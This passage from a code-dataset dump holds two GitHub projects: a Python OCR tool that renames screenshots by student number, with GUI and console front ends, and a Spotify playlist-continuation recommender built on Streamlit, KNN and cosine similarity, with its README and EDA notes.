对切出的图片进行再次处理,以便图像识别\n kernel = numpy.ones((2, 2), dtype=numpy.uint8)\n # 腐蚀以加粗\n img = cv2.erode(img, kernel=kernel, iterations=1)\n # 重新映射回 rgb\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)\n\n if show_img:\n # 自由拉伸窗口\n # cv2.namedWindow('final img', 0)\n 
cv2.imshow('final img', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return img\n\n def __ocr_number(self, img_list: List[numpy.ndarray]):\n \"\"\"\n 识别数字\n :param img_list:\n :return:\n \"\"\"\n return self.__ocr.ocr_for_single_lines(img_list)\n\n def __std_number(self, img: numpy.ndarray):\n \"\"\"\n 定位数字\n :param img:\n :return:\n \"\"\"\n return [i['cropped_img'] for i in self.__std.detect(img)]\n\n @staticmethod\n def __handle_result_list(result_list: List[List[str]]) -> [str, bool]:\n \"\"\"\n 处理结果列表\n :param result_list: 结果列表\n :return: 结果,是否有效\n \"\"\"\n result = result_list[0]\n\n if len(result) < 12 and len(result_list) > 1:\n for i in result_list:\n if len(i) >= 12:\n result = i\n\n result = ''.join(result[:12] if len(result) >= 12 else result)\n print(result, re.match(r'\\d{12}', result) is not None)\n return result, re.match(r'\\d{12}', result) is not None\n\n def __handle_dup_name(self, name, path):\n dup_keys = self.__dup_name_dict.get(name)\n # 如设置过,即表明有重复的\n if dup_keys:\n # 设置重复的为 True,只要第一次重复时设置即可\n if 1 == len(dup_keys):\n self.__info_dict[dup_keys[0]]['dup'] = True\n # 将本次的 path 也添加进去\n self.__dup_name_dict[name].append(path)\n return True\n else:\n self.__dup_name_dict[name] = [path]\n return False\n\n def __handle_info(self, key, value):\n \"\"\"\n 处理每条信息\n :param key:\n :param value:\n \"\"\"\n name, is_legal = self.__handle_result_list(value)\n self.__info_dict[key] = {\n 'name': name,\n 'suffix': self.__get_suffix(key),\n 'legal': is_legal,\n 'dup': self.__handle_dup_name(name, key)\n }\n\n def print_info(self):\n \"\"\"\n 打印图片信息\n :return:\n \"\"\"\n beeprint.pp(self.__info_dict)\n return self\n\n def print_dup(self):\n \"\"\"\n 打印重复图片信息\n :return:\n \"\"\"\n beeprint.pp(self.__dup_name_dict)\n return self\n\n def write_out(self,\n path: str = '.',\n out_path_suc: str = 'output_suc',\n out_path_dup: str = 'output_dup',\n out_path_fail: str = 'output_fail'):\n \"\"\"\n 输出重命名后的图片到文件夹\n :param path: 文件夹路径\n :param out_path_suc: 合规且不重复图片所在的文件夹\n :param out_path_dup: 合规但是重复图片所在的文件夹\n :param out_path_fail: 其它图片所在文件夹\n :return: self\n \"\"\"\n # 处理路径\n path = self.__format_path(path)\n\n if os.path.isdir(path):\n # 拼接文件路径\n suc = os.path.join(path, out_path_suc)\n fail = os.path.join(path, out_path_fail)\n dup = os.path.join(path, out_path_dup)\n\n # 创建结果文件夹\n not os.path.exists(suc) and os.makedirs(suc)\n not os.path.exists(fail) and os.makedirs(fail)\n not os.path.exists(dup) and os.makedirs(dup)\n\n # 将图片输出到相应的文件夹\n for key, value in self.__info_dict.items():\n # 合规且不重复\n if value.get('legal') is True and value.get('dup') is False:\n copyfile(key, os.path.join(suc, f'{value.get(\"name\")}.{value.get(\"suffix\")}'))\n # 合规但是重复\n elif value.get('legal') is True and value.get('dup') is True:\n index = self.__dup_name_dict[value.get(\"name\")].index(key)\n copyfile(key,\n os.path.join(dup, f'{value.get(\"name\")}.{index}.{value.get(\"suffix\")}'))\n else:\n copyfile(key,\n os.path.join(fail, f'{value.get(\"name\")}.{value.get(\"suffix\")}' or os.path.split(key)[1]))\n else:\n print(f'“{path}” 并非一个合法的路径!')\n\n return self\n\n\ndef main():\n \"\"\"请自行寻找测试数据\"\"\"\n # PickStuNumber(\"./pics\", show_img=False).print_info().write_out()\n # PickStuNumber(\"./pics/test.jpeg\", show_img=True).print_info()\n # PickStuNumber(\"./pics/IMG.jpg\", show_img=True).print_info()\n # PickStuNumber(\"./pics/IMG_023.jpg\", show_img=True).print_info()\n # PickStuNumber(\"./pics/F6D35171-ECCF-4D28-BFF5-69B31453A2FB_big.jpg\", show_img=True).write_out()\n pass\n\n\nif __name__ == 
'__main__':\n main()\n" }, { "alpha_fraction": 0.4365079402923584, "alphanum_fraction": 0.6746031641960144, "avg_line_length": 14.875, "blob_id": "99e84148e39e86f40e466f42d91f2b5408210896", "content_id": "bf93a372562dd9a15375c506ab2b5ba00699bf5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 126, "license_type": "no_license", "max_line_length": 23, "num_lines": 8, "path": "/requirements.txt", "repo_name": "TurnA-Lab/auto-rename-pic", "src_encoding": "UTF-8", "text": "cnstd==0.1.1\ntqdm==4.54.1\ncnocr==1.2.2\nclick==7.1.1\nnumpy==1.18.1\nbeeprint==2.4.10\nopencv_python==4.2.0.32\nPySimpleGUI==4.32.1" }, { "alpha_fraction": 0.42823687195777893, "alphanum_fraction": 0.4404483139514923, "avg_line_length": 32.774009704589844, "blob_id": "a7dbc6857fec330903aaa55ecc2bef42c869bbd0", "content_id": "eaaf403e4c11f4a69b753e669679ceb66c5475aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6352, "license_type": "no_license", "max_line_length": 118, "num_lines": 177, "path": "/desktop.py", "repo_name": "TurnA-Lab/auto-rename-pic", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'iskye'\n\nimport ctypes\nimport platform\nimport subprocess\n\nimport PySimpleGUI as sg\n\nfrom pick_stu_number import PickStuNumber\n\n\ndef exe_cmd_subprocess(command, *args):\n try:\n sp = subprocess.Popen([command, *args], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = sp.communicate()\n if out:\n print(out.decode(\"utf-8\"))\n if err:\n print(err.decode(\"utf-8\"))\n except Exception:\n pass\n\n\ndef make_dpi_aware():\n \"\"\"\n 高清分辨率\n 来源:https://github.com/PySimpleGUI/PySimpleGUI/issues/1179#issuecomment-475899050\n \"\"\"\n if int(platform.release()) >= 8:\n ctypes.windll.shcore.SetProcessDpiAwareness(True)\n\n\ndef main():\n make_dpi_aware()\n\n # 设置主题\n sg.theme('Light Grey 4')\n\n # 图片文件夹路径\n img_folder = {\n 'key': '-ImgFolder-',\n 'default': '.'\n }\n # 是否显示图片\n show_img = {\n 'key': '-ShowImg-',\n 'keyT': '-ShowImgT-',\n 'keyF': '-ShowImgF-',\n 'default': False\n }\n # 输出路径\n output = {\n 'key': '-Output-',\n 'default': '.'\n }\n # 合规且不重复\n output_suc = {\n 'key': '-OutputSuc-',\n 'default': 'output_suc'\n }\n # 合规但是重复\n output_dup = {\n 'key': '-OutputDup-',\n 'default': 'output_dup'\n }\n # 不合规\n output_fail = {\n 'key': '-OutputFail-',\n 'default': 'output_fail'\n }\n\n # 开始执行\n basic = [[sg.Text('请选择图片所在文件夹路径')],\n [sg.Input(sg.user_settings_get_entry(img_folder.get('key'),\n img_folder.get('default')),\n key=img_folder.get('key'), size=(25, 1)),\n sg.FolderBrowse(button_text='浏览')],\n [sg.OK(button_text='立即开始')],\n [sg.Output(size=(30, 10))]]\n\n # 配置\n config = [[sg.Frame(title='处理配置',\n layout=\n [[sg.Column(\n size=(320, 60),\n layout=\n [[sg.Text('显示处理图片过程', size=(18, 1)),\n sg.Radio('是', 'show_img',\n default=sg.user_settings_get_entry(\n show_img.get('key'), show_img.get('default')) is True,\n key=show_img.get('key')),\n sg.Radio('否', 'show_img',\n default=sg.user_settings_get_entry(\n show_img.get('key'), show_img.get('default')) is False)]]\n )]])\n ],\n [sg.Frame(title='输出配置',\n layout=\n [[sg.Column(\n size=(320, 160),\n layout=\n [[sg.Text('输出路径', size=(18, 1)),\n sg.Input(sg.user_settings_get_entry(output.get('key'), output.get('default')),\n key=output.get('key'), size=(6, 1)),\n sg.FolderBrowse(button_text='浏览')],\n [sg.Text('合规图片文件夹名', size=(18, 1)),\n 
sg.Input(sg.user_settings_get_entry(output_suc.get('key'), output_suc.get('default')),\n key=output_suc.get('key'), size=(15, 1))],\n [sg.Text('重复图片文件夹名', size=(18, 1)),\n sg.Input(sg.user_settings_get_entry(output_dup.get('key'), output_dup.get('default')),\n key=output_dup.get('key'), size=(15, 1))],\n [sg.Text('其它图片文件夹名', size=(18, 1)),\n sg.Input(sg.user_settings_get_entry(output_fail.get('key'), output_fail.get('default')),\n key=output_fail.get('key'), size=(15, 1))]]\n )]])\n ],\n [sg.OK(button_text='保存')]]\n\n # 选项卡\n layout = [[sg.TabGroup(layout=[[sg.Tab('开始', basic), sg.Tab('配置', config)]])]]\n\n # 显示的窗口\n window = sg.Window(title='青年大学习截图重命名',\n margins=(30, 30),\n font=('Microsoft YaHei', 10),\n finalize=True,\n layout=layout).finalize()\n\n # 处理事件\n while True:\n event, values = window.read()\n\n # print(event, values)\n if event == sg.WIN_CLOSED:\n break\n elif event == '立即开始':\n # 禁用关闭\n window.DisableClose = True\n\n print('即将开始处理图片')\n print('请在处理完毕后再关闭本窗口\\n')\n print('-' * 30)\n\n PickStuNumber(\n values.get(img_folder.get('key')),\n sg.user_settings_get_entry(show_img.get('key'), show_img.get('default'))) \\\n .write_out(\n sg.user_settings_get_entry(output.get('key'), output.get('default')),\n sg.user_settings_get_entry(output_suc.get('key'), output_suc.get('default')),\n sg.user_settings_get_entry(output_dup.get('key'), output_dup.get('default')),\n sg.user_settings_get_entry(output_fail.get('key'), output_fail.get('default')))\n\n print()\n print('处理完毕')\n print('-' * 30)\n\n # 启用关闭\n window.DisableClose = False\n\n elif event == '保存':\n for key in {img_folder.get('key'), show_img.get('keyT'), output.get('key'),\n output_suc.get('key'), output_dup.get('key'), output_fail.get('key')}:\n if key is show_img.get('keyT'):\n sg.user_settings_set_entry(show_img.get('key'), values.get(show_img.get('key')))\n else:\n sg.user_settings_set_entry(key, values.get(key))\n\n # 关闭窗口\n window.close()\n pass\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6326942443847656, "alphanum_fraction": 0.6347123980522156, "avg_line_length": 27.314285278320312, "blob_id": "72f3f255c5af8e3a7a28232e1b65d5f2c3eb8eb8", "content_id": "98854e2fff9e9281d47c2f0087356dc1aeb8dc84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1191, "license_type": "no_license", "max_line_length": 94, "num_lines": 35, "path": "/console.py", "repo_name": "TurnA-Lab/auto-rename-pic", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'iskye'\n\nimport click\n\nfrom pick_stu_number import PickStuNumber\n\n\[email protected]()\[email protected]('--path', default='.', help='图片或者图片所在文件夹的路径')\[email protected]('--show-img', default=False, help='是否展示处理图片过程')\[email protected]('--show-info', default=False, help='是否展示处理图片结果')\[email protected]('--output', default='.', help='图片输出到的文件夹路径')\[email protected]('--output-suc', default='output_suc', help='合规且不重复图片所在的文件夹名')\[email protected]('--output-dup', default='output_dup', help='合规但是重复图片所在的文件夹名')\[email protected]('--output-fail', default='output_fail', help='其它图片所在的文件夹名')\[email protected]_option(help='显示帮助')\ndef main(path,\n show_img,\n show_info,\n output,\n output_suc,\n output_dup,\n output_fail):\n \"\"\"自动重命名图片为学号\"\"\"\n psn = PickStuNumber(path, show_img).write_out(output, output_suc, output_dup, output_fail)\n if show_info:\n psn.print_info()\n pass\n\n\nif __name__ == '__main__':\n main()\n" } ]
4
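The __cutter routine in the pick_stu_number.py record above follows a common OpenCV recipe: Otsu binarization, heavy dilation so the red banner merges into a single blob, then bounding-rect extraction on the area-sorted contours. A stripped-down sketch of just that recipe — the file name, kernel size, and crop offsets below are placeholders, not the repo's tuned empirical values:

```python
import cv2
import numpy as np

img = cv2.imread('sample.jpg', 0)  # grayscale read (placeholder file name)
_, binary = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)

kernel = np.ones((15, 15), dtype=np.uint8)
dilated = cv2.dilate(binary, kernel, iterations=2)  # merge strokes into blobs

# OpenCV 4.x (as pinned in requirements.txt) returns (contours, hierarchy)
contours, _ = cv2.findContours(dilated, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
if contours:
    x, y, w, h = cv2.boundingRect(contours[0])       # largest blob's box
    crop = binary[y + h:y + h + 190, x:x + w]        # region just below the blob
    # (a real implementation would clamp the slice at the image border)
```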
allisonjaye/playlist_continuation
https://github.com/allisonjaye/playlist_continuation
14bf080c8aaab60d7f3c6323100f2c647c2e9e5b
a7f49406226791a02be5a396e3ef1cf66d065c00
04828556da34ecafecca61313c62db7dd4fe53d7
refs/heads/main
2023-07-16T06:22:46.634021
2021-08-24T18:30:24
2021-08-24T18:30:24
394,505,991
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6696428656578064, "alphanum_fraction": 0.7946428656578064, "avg_line_length": 21.399999618530273, "blob_id": "6f097c6300fe60da44a73b73d7600b1477a4ccaa", "content_id": "379a4c86412b9eb407bc97042a24bc88990e56ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 112, "license_type": "no_license", "max_line_length": 34, "num_lines": 5, "path": "/website/.streamlit/config.toml", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "[theme]\nprimaryColor=\"#1db954\"\nbackgroundColor=\"#191414\"\nsecondaryBackgroundColor=\"#1db954\"\ntextColor=\"#ffffff\"\n" }, { "alpha_fraction": 0.5325708389282227, "alphanum_fraction": 0.5589259266853333, "avg_line_length": 21.322221755981445, "blob_id": "da5fbd2f2bd8220b53d0532df54534d0fcbd9617", "content_id": "2b66d906633d44bab9cecf33e1183c76fdb92b5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2012, "license_type": "no_license", "max_line_length": 68, "num_lines": 90, "path": "/EDA_README.md", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "first 10000 playlists\n\n tracks:\n 664712 total tracks\n 170089 unique track ids\n 132920 unique track names\n top tracks with artist:\n HUMBLE. by Kendrick Lamar\n Closer by The Chainsmokers\n One Dance by Drake\n Broccoli (feat. Lil Yachty) by DRAM\n Congratulations by Post Malone\n Caroline by Aminé\n Bad and Boujee (feat. Lil Uzi Vert) by Migos\n iSpy (feat. Lil Yachty) by KYLE\n XO TOUR Llif3 by Lil Uzi Vert\n No Problem (feat. Lil Wayne & 2 Chainz) by Chance The Rapper\n Home by multiple artists\n top track names:\n Closer\n Home\n HUMBLE.\n Roses\n One Dance\n Ride\n Congratulations\n Let Me Love You\n Broccoli (feat. Lil Yachty)\n Caroline\n\n artists:\n 35637 unique artists\n top artists:\n Drake\n Kanye West\n Kendrick Lamar\n Rihanna\n The Weeknd\n Ed Sheeran\n Future\n Eminem\n The Chainsmokers\n J. Cole\n\n albums:\n 69059 unique albums\n 81565 unique album ids\n top albums with artist:\n Views by Drake\n Stoney by Post Malone\n More Life by Drake\n DAMN. 
by Kendrick Lamar\n Coloring Book by Chance the Rapper\n Beauty Behind the Madness by The Weeknd\n Culture by Migos\n American Teen by Khalid\n Blurryface by Twenty One Pilots\n Purpose by Justin Bieber\n top album names:\n Views\n Stoney\n Greatest Hits\n More Life\n DAMN.\n Coloring Book\n Beauty Behind the Madness\n Culture\n American Teen \n Purpose\n\n playlists:\n 5954 unique titles\n 5-250 songs in playlist\n 66.5 avg songs in playlist\n top playlist titles:\n Country/country\n Chill/chill\n Rock\n Rap/rap\n Workout/workout\n oldies/Oldies\n Party\n Worship\n Christmas\n jams\n Classic Rock\n EDM\n Music\n Disney\n 80s\n\n\n" }, { "alpha_fraction": 0.5984792709350586, "alphanum_fraction": 0.6333088278770447, "avg_line_length": 55.375, "blob_id": "59720c78297ef08dbeb0dc4e2c3aa444c8bb0c62", "content_id": "2c351ea5644dc301759b65823dbcdfb0d5121fd4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4077, "license_type": "no_license", "max_line_length": 131, "num_lines": 72, "path": "/website/knn.py", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "import streamlit as st\nimport streamlit.components.v1 as components\nimport numpy as np\nimport pandas as pd\nfrom sklearn.neighbors import NearestNeighbors\nfrom scipy.sparse import load_npz\nfrom collections import Counter\nimport pickle\n\ndata = pd.read_pickle('website/data.pkl')\n\nst.title(\"Please Don't Stop The Music:\")\nst.header(\"A Playlist Continuation Program\")\nwith st.form(key='my form'):\n random_playlists = ['Throwbacks', 'Country jams', 'Classic Rock', 'Christmas', 'Disney']\n p_name = st.selectbox('Choose a Playlist', (random_playlists))\n playlist_index = data[data.playlist_name == p_name][\"pid\"].values[0]\n col1, col2 = st.columns(2)\n submitted1 = col1.form_submit_button(\"Check it Out\")\n col1.header(\"Original Playlist\")\n submitted2 = col2.form_submit_button(\"Recommend Songs\")\n col2.header(\"Recommendations\")\n\n if submitted1:\n with col1:\n play_tracks = data[data.pid == playlist_index]['trackid'].sample(5, random_state=1).tolist()\n track1, track2, track3, track4, track5 = play_tracks\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track5}\", height=80, width=300))\n\n\n if submitted2:\n with col1:\n play_tracks = data[data.pid == playlist_index]['trackid'].sample(5, random_state=1).tolist()\n track1, track2, track3, track4, track5 = play_tracks\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track5}\", height=80, width=300))\n with col2:\n data2 = pd.read_pickle('website/data2.pkl')\n sparse = load_npz('website/sparse2.npz')\n model_knn = NearestNeighbors(metric='cosine', 
algorithm='brute', n_neighbors=20, n_jobs=-1)\n\n model_knn.fit(sparse)\n distances, indices = model_knn.kneighbors(sparse[playlist_index], n_neighbors=50)\n raw_recommends = sorted(list(zip(indices.squeeze().tolist(), distances.squeeze().tolist())), key=lambda x: x[1])[:0:-1]\n dif_songs = []\n for (idx, dist) in raw_recommends:\n dif = sparse[idx] - sparse[playlist_index]\n dif[dif<0] = 0\n dif_indicies = dif.nonzero()\n dif_songs.append(dif_indicies[1])\n total = np.hstack(dif_songs)\n common = Counter(total).most_common(5)\n song_indicies_list = []\n for row in common:\n song_indicies_list.append(row[0])\n track_uri = []\n for idx in song_indicies_list:\n track_uri.append(data2.index[idx])\n song1, song2, song3, song4, song5 = track_uri\n \n print(components.iframe(f\"https://open.spotify.com/embed/track/{song1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song5}\", height=80, width=300))\n \n \n" }, { "alpha_fraction": 0.5542168617248535, "alphanum_fraction": 0.7228915691375732, "avg_line_length": 12.833333015441895, "blob_id": "e13ab4a622c098de4e05d27d5d2d3372947b41d4", "content_id": "30df1eb3636f333a4f57f9097e749b906f14ab11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 126, "license_type": "no_license", "max_line_length": 23, "num_lines": 8, "path": "/website/requirements.txt", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "numpy==1.20.1\nstreamlit==0.87.0\nmatplotlib==3.4.1\npandas==1.2.3\nscikit-learn\nscipy\n" }, { "alpha_fraction": 0.5953627228736877, "alphanum_fraction": 0.6079055070877075, "avg_line_length": 51.404762268066406, "blob_id": "3fc0e422bfa87da297b2379a19981750691c538f", "content_id": "725e2f673253e19a7bf42d9826a1df8b4afea9af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4011, "license_type": "no_license", "max_line_length": 108, "num_lines": 75, "path": "/website/cossim.py", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "import streamlit as st\nimport streamlit.components.v1 as components\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy.sparse import load_npz\nfrom collections import Counter\nimport pickle\n\ndata = pd.read_pickle('data.pkl')\n\nst.title(\"Please Don't Stop The Music:\")\nst.header(\"A Playlist Continuation Program\")\nwith st.form('my form'):\n random_playlists = ['Throwbacks', 'Country jams', 'Classic Rock', 'Christmas', 'Disney']\n p_name = st.selectbox('Choose a Playlist', (random_playlists))\n playlist_index = data[data.playlist_name == p_name][\"pid\"].values[0]\n col1, col2 = st.columns(2)\n submitted1 = col1.form_submit_button(\"Check it Out\")\n col1.header(\"Original Playlist\")\n submitted2 = col2.form_submit_button(\"Recommend Songs\")\n col2.header(\"Recommendations\")\n\n if submitted1:\n with col1:\n play_tracks = data[data.pid == playlist_index]['trackid'].sample(5, random_state=1).tolist()\n track1, track2, track3, track4, track5 = play_tracks\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track1}\", height=80, 
width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track5}\", height=80, width=300))\n\n\n if submitted2:\n with col1:\n play_tracks = data[data.pid == playlist_index]['trackid'].sample(5, random_state=1).tolist()\n track1, track2, track3, track4, track5 = play_tracks\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track5}\", height=80, width=300))\n with col2:\n with open(\"pivot_columns.txt\", \"rb\") as fp:\n pivot = pickle.load(fp)\n sparse = load_npz('sparse.npz')\n\n cos_sim = cosine_similarity(sparse)\n sim_playlists = list(enumerate(cos_sim[playlist_index]))\n sorted_similar_playlists = sorted(sim_playlists,key=lambda x:x[1],reverse=True)[1:]\n dif_songs = []\n for row in sorted_similar_playlists[:500]:\n dif = sparse[row[0]] - sparse[playlist_index]\n dif[dif==-1] = 0\n dif_indicies = dif.nonzero()\n dif_songs.append(dif_indicies[1])\n total = np.hstack(dif_songs)\n common = Counter(total).most_common(5)\n song_indicies_list = []\n for row in common:\n song_indicies_list.append(row[0])\n track_uri = []\n for index in song_indicies_list:\n track_uri.append(data[data['track_name'] == pivot[index]]['trackid'].iloc[0])\n song1, song2, song3, song4, song5 = track_uri\n \n print(components.iframe(f\"https://open.spotify.com/embed/track/{song1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song5}\", height=80, width=300))\n \n \n" }, { "alpha_fraction": 0.7469649314880371, "alphanum_fraction": 0.7611512541770935, "avg_line_length": 81.37078857421875, "blob_id": "a60bea85485b54c56f079f39d807fa83522211bb", "content_id": "843c07f54577640230d2052e4b88ac2d69e70f42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7337, "license_type": "no_license", "max_line_length": 716, "num_lines": 89, "path": "/README.md", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "# Please Don't Stop the Music: A Playlist Continuation Program\n<div align=\"center\"><img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/397-3976701_spotify-logo-green-png.jpeg\" width=\"275\" height=\"100\">\n \n<div align=\"left\">\n\n## Table of contents\n- [Introduction](#introduction)\n - [Overview](#overview)\n - [Motivation](#motivation)\n- [Exploratory Data Analysis](#exploratory-data-analysis)\n - [Data Descriptions](#data-descriptions)\n - [Visualizations](#visualizations)\n- [Models](#models)\n - [Baseline 
Model](#baseline-model)\n - [Collaborative Filtering](#collaborative-filtering)\n- [Results](#results)\n - [Recommendation Web App](#recommendation-web-app)\n- [Next Steps](#next-steps)\n## Introduction\n### Overview\nThis program is designed to automatically continue a user's playlist on any music platform - here, Spotify. When used, it will help users find new music they enjoy as well as keep them using the platform longer. My steps for completing this program start with exploring and learning about the data. Then I created a simple baseline model as a reference point for improvement. Using multiple different models, I predicted if a user would enjoy the songs enough to add them to their playlist. Finally, I implemented the best model into a web app to recommend songs from a random playlist.\n\n### Motivation\nOver the past decade, music streaming services have become increasingly popular, changing the way consumers interact with their audio content. Listeners are no longer bound to predetermined track listings on an album or record; rather, they are free to construct their own playlists as they see fit. As a result, the task of automatic playlist generation has become increasingly relevant to the streaming community. These services rely on intelligent systems in order enhance the playlist creation experience, analyzing user preferences and tastes to recommend new songs. This project seeks to test the power of these recommendation models – observing which techniques perform best in the playlist continuation task.\n\n## Exploratory Data Analysis\n### Data Descriptions\nThe data used in this program is from Spotify's Million Playlist Dataset. It is publically accessable [here](https://www.aicrowd.com/challenges/spotify-million-playlist-dataset-challenge/dataset_files). The file structure consists of 10,000 .json subfiles, with each subfile containing 1,000 playlists. 
Each playlist object contains the following attributes:\n\n- **'collaborative'**: boolean (describes whether or not it is a collaborative playlist)\n- **'duration_ms'**: int (the duration of the entire playlist in milliseconds)\n- **'modified_at'**: int (the Unix Epoch Time value of when the playlist was last modified)\n- **'name'**: str (name of the playlist)\n- **'num_albums'**: int (number of unique albums in the playlist)\n- **'num_artists'**: int (number of unique artists in the playlist)\n- **'num_edits'**: int (number of times the playlist has been edited)\n- **'num_followers'**: int (number of users that follow the playlist)\n- **'num_tracks'**: int (number of tracks on the playlist)\n- **'pid'**: int (the playlist ID number, ranging from 0 - 999,999,999)\n- **'tracks'**: list of track objects (contains a list of tracks, where each track is an object containing the following attributes:\n - {**'album_name'**: str (the name of the track’s album)\n - **'album_uri'**: str (the unique album ID -- uniform resource identifier)\n - **'artist_name'**: str (the name of the artist)\n - **'artist_uri'**: str (the unique artist ID -- uniform resource identifier)\n - **'duration_ms'**: int (the duration of the track in milliseconds)\n - **'pos'**: int (the track’s position in the playlist)\n - **'track_name'**: str (the name of the track)})\n\n### Visualizations\nTaking a look into the data, the songs that appeared most frequently in all of the playlists were mostly rap/hip-hop.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_songs.jpg\" width=\"720\" height=\"432\">\n \nThe most popular song *titles* were very similar but not exactly the same due to some songs having the same title.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_song_titles.jpg\" width=\"720\" height=\"432\">\n \nI found that the most popular playlist title was 'Country'.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_playlist_titles.jpg\" width=\"720\" height=\"432\">\n \nThe most popular artists throughly the playlist corresponded highly with the most popular songs.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_artists.jpg\" width=\"720\" height=\"432\">\n \nThe same with the most popular albumns.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_albums.jpg\" width=\"720\" height=\"432\">\n \nMost popular album *titles* throughout the playlists also include 'Greatest Hits' because so many different artists have an album with this title.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_album_titles.jpg\" width=\"720\" height=\"432\">\n\n## Models\n \n### Baseline Model\nTo start, I created a baseline model as a reference point for growth. This model recommended most popular songs as a continuation for any playlist. From exploring the data, it seemed that this would work well for playlists that were mostly rap/hip-hop based but not so well with any other genre. With most playlists being titled 'Country', this model would not work well very often.\n \n### Collaborative Filtering\nTo combat this, I added a collaborative filtering algorithm. I shifted the data into a sparse matrix with each playlist on one side and all of the songs on the other. If a song was on a playlist, it received a one and otherwise, it received a zero. 
I then used K-Nearest Neighbors to find similarities between each playlist based on values of song. From the top 500 most similar playlists, the algorithm compiles the most common songs not including the songs already on given playlist. These songs are then recommended to the user. \n \n## Results\n \n### Recommendation Web App\nUsing Streamlit, I was able to produce a functioning web application that allows the user a choice of sample playlists to get recommendations from. Try it for yourself [here](https://share.streamlit.io/allisonjaye/playlist_continuation/main/website/knn.py). This is a screenshot example from the 'Classic Rock' playlist.\n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/Screen%20Shot%202021-08-10%20at%2010.49.16%20PM.png\" width=\"905\" height=\"432\">\n\n## Next Steps\nI plan continue improving my program by tuning hyperparameters, testing more models, and including a matrix factorization technique like SVD or NMF. I will also develop the website's capabilities to allow users to imput their own playlists or even just songs that they enjoy. Using another dataset with meta data about each song, I will implement a hybrid recommender that not only finds similarities in the playlists, but in the songs themselves. Instead of using human opinion as a measurement of accuracy, I will create a testing method to be able to see how well each model is doing numerically.\n" } ]
6
